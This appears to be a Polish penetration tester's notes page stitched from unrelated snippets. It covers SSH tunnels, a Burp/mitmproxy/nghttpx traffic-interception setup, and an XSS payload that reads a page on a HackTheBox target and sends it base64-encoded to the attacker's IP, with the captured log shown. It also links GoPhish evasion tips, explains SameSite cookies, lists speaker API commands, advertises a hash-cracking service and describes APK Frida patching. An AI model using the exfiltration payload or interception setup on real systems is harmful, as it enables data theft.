Linux in Lan2: SSH -L 5000:127.0.0.1:5555 w4cky@VPS_IP -p 8080
Linux in Lan2: ssh -D 1234 root@localhost -p 5000
0)
sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv6.conf.all.forwarding=1
sysctl -w net.ipv4.conf.all.send_redirects=0
1)
iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d dst_ip -j REDIRECT --to-port 8080
2) useradd --create-home mitmproxyuser
3) xhost +
4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;java -jar /usr/bin/burpsuite"
or
4) sudo -u mitmproxyuser -H bash -c "export DISPLAY=:0.0;mitmproxy"
as root:
iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080
adduser mitmproxyuser
cat /etc/nghttpx/nghttpx.conf (downstream config)
frontend=0.0.0.0,8080;no-tls
backend=127.0.0.1,8081;;proto=http/1.1
backend-keep-alive-timeout=5m
frontend-http2-read-timeout=5m
frontend-read-timeout=5m
frontend-write-timeout=5m
stream-read-timeout=5m
stream-write-timeout=5m
backend-read-timeout=5m
backend-write-timeout=5m
backend-connect-timeout=5m
listener-disable-timeout=5m
backend-http2-window-size=134217720
backend-http2-connection-window-size=1073741760
frontend-http2-window-size=134217720
frontend-http2-connection-window-size=1073741760
http2-proxy=no
private-key-file=/etc/nghttpx/server.key
certificate-file=/etc/nghttpx/server.crt
cacert=/etc/nghttpx/ca.crt
accesslog-syslog=yes
errorlog-syslog=yes
workers=5
cat /etc/nghttpx/upstream.conf (upstream config)
frontend=127.0.0.1,8082;no-tls
backend=vendor-IP,28900;;no-tls;proto=h2
backend-keep-alive-timeout=5m
frontend-http2-read-timeout=5m
frontend-read-timeout=5m
frontend-write-timeout=5m
stream-read-timeout=5m
stream-write-timeout=5m
backend-read-timeout=5m
backend-write-timeout=5m
backend-connect-timeout=5m
listener-disable-timeout=5m
http2-proxy=no
accesslog-syslog=yes
errorlog-syslog=yes
workers=5
run nghttp as root:
┌──(root💀kali)-[/etc/nghttpx]
└─# nghttpx
2020-12-18T14:38:21.383+01:00 8777 8777 99aaafb4 NOTICE (shrpx.cc:2882) Loading configuration from /etc/nghttpx/nghttpx.conf
run burp suite proxy 127.0.0.1:8081 (invisible proxy)
USER OPTIONS -> Upstream proxy add 127.0.0.1:8082
as mitmproxyuser:
┌──(mitmproxyuser㉿kali)-[/etc/nghttpx]
└─$ nghttpx --conf upstream.conf
2020-12-18T14:42:00.364+01:00 9293 9293 59e630c7 NOTICE (shrpx.cc:2882) Loading configuration from upstream.conf
as root:
run python code (client http2)
var xhr=new XMLHttpRequest();
xhr.open("GET", 'http://gym-club..htb/security_threat/report.php', false);
xhr.send();
var xhr2=new XMLHttpRequest();
xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false);
xhr2.send();
└─# python3 -m http.server 80Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /2.js HTTP/1.1" 200 -10.10.10.208 - - [13/Mar/2021 11:54:48] code 404, message File not found10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /aaaa?=PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICA8dGl0bGU+U2VjdXJpdHkgUmVwb3J0PC90aXRsZT4KICA8c3R5bGU+CiAgICB0YWJsZSwgdGgsIHRkIHsKICAgICAgYm9yZGVyOiAxcHggc29saWQgYmxhY2s7CiAgICB9CiAgPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KPGg0PkxvZ2dlZCBYU1MgYXR0ZW1wdHM8L2g0Pgo8dGFibGU+CiAgPHRoZWFkPgogICAgPHRyPgogICAgICA8dGQ+VGltZXN0YW1wPC90ZD4KICAgICAgPHRkPlVzZXIgQWdlbnQ8L3RkPgogICAgICA8dGQ+SVAgQWRkcmVzczwvdGQ+CiAgICA8L3RyPgogIDwvdGhlYWQ+Cjx0Ym9keT4KPC90Ym9keT4KPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -
Ciekawy artykuł, pokazujący jak zmienić GoPhish
https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls
SameSite=None
— plik cookie jest wysyłany we „wszystkich kontekstach” — mniej więcej tak, jak działały rzeczy przed wynalezieniem SameSite.SameSite=Strict
—plik cookie jest wysyłany tylko w przypadku żądań pochodzących z tej samej domeny. Nawet wchodząc na witrynę z linku spoza witryny, plik cookie nie zostanie wyświetlony, chyba że później odświeżysz stronę lub nawigujesz w obrębie witryny.SameSite=Lax
—plik cookie jest wysyłany, jeśli przejdziesz do witryny przez kliknięcie linku z innej domeny, ale nie, jeśli prześlesz formularz. To jest na ogół to, co chcesz chronić przed atakami CSRF!Przydaje się podczas red teamingu
1) set music:
http://192.168.51.173/httpapi.asp?command=setPlayerCmd:play:http://192.168.51.5/music/mata.mp3
2) loop(1)/or noloop(0)
http://192.168.51.173/httpapi.asp?command=setPlayerCmd:loopmode:1
3) listen radio internet
http://192.168.51.173/httpapi.asp?command=setPlayerCmd:play:http://pr320.pinguinradio.nl/listen.pls
https://github.com/AndersFluur/LinkPlayApi/blob/master/api.md
Stworzyłem skrypt, który sprawdza czy urządzenie jest włączone do prądu i jeśli jest to ma włączyć muzyke - do wykorzystania w inteligentnych domach.
Uruchomiłem dla Was możliwość łamania haseł on-line na moich urządzeniach.
Zbudowałem 4 komputery obliczeniowe złożone z:
1) 10 x GPU RX 6600 XT
2) 10 x GPU RX 6600 XT
3) 3 x GPU RX 6600 i 3 x GPU 6600 XT
4) 2 x GPU RX 6600 XT
Dzięki tej usłudze Twoje pentesty i red teamingi będą dużo bardziej skuteczne, w końcu będziesz miał szansę w szybkim czasie złamać przejęty hash.
Jeśli sam zapomniałeś swojego hasła i masz hash to ta usługa jest również dla Ciebie. Jeśli zapomniałeś hasła do swojego WiFi to też możliwe jest jego złamanie bo dostarczeniu handshake.
Hasła są łamane za pomocą hashcat.
Oferuje łamanie hashy w oparciu o swoje słowniki, ale również możesz dostarczyć swój słownik.
Koszt przedstawiam indywidualnie po kontakcie ze mną blaszczakm+hashcat @ gmail . com
Usługa polega na wynajmie mocy obliczenowej jednego z 4 komputerów + konfiguracji po mojej stronie procesu odwracania hasha. Jako klient decydujesz czy wynajmujesz moc na kilka dni, czy kilka miesięcy. W momencie złamania hasha usługa może się zatrzymać i nie naliczać więcej opłaty.
Możesz bez ryzyka wynająć moc na 1 miesiąc, a zapłacisz realnie tylko za 3 dni, jeśli w ciągu 3 dni hasło zostanie odwrócone.
Usługa dedykowana pentesterom oraz działom bezpieczeństwa.
P.S.
Dla osób nietechnicznych - usługa nie łamie haseł do fecebooka, poczty itp.
Usługa tylko odwraca hashe. Więc jeśli masz hash, który chcesz odwrócić to możesz się skontaktować.
P.S.2
Dla moich klientów, którzy zamawiają u mnie testy penetracyjne usługa jest już wliczona w cenę. Jeśli w procesie testów penetracyjnych odnajdę hash hasła to od teraz ten hash będzie poddany testom bezpieczeństwa na powyższych komputerach, co pozwoli uzyskać moim klientom wyższą jakość usługi.
apk.sh to skrypt Bash, który ułatwia inżynierię wsteczną aplikacji na Androida, automatyzując niektóre powtarzalne zadania, takie jak ściąganie, dekodowanie, przebudowywanie i łatanie pliku APK.
Cechy
apk.sh zasadniczo używa apktool do dezasemblacji, dekodowania i odbudowy zasobów oraz trochę basha do automatyzacji procesu wstrzykiwania gadżetów frida . Obsługuje również pakiety aplikacji/podzielone pliki APK.
🍄 Łatanie plików APK w celu załadowania frida-gadget.so na starcie.
🆕 Obsługa pakietów aplikacji/podzielonych plików APK.
🔩 Przebudowywanie zdekodowanych zasobów z powrotem do binarnego pliku APK/JAR za pomocą apktool.
🗝️ Kod podpisując apk za pomocą apksigner.
https://infosecwriteups.com/domain-admin-compromise-in-3-hours-5778902604c9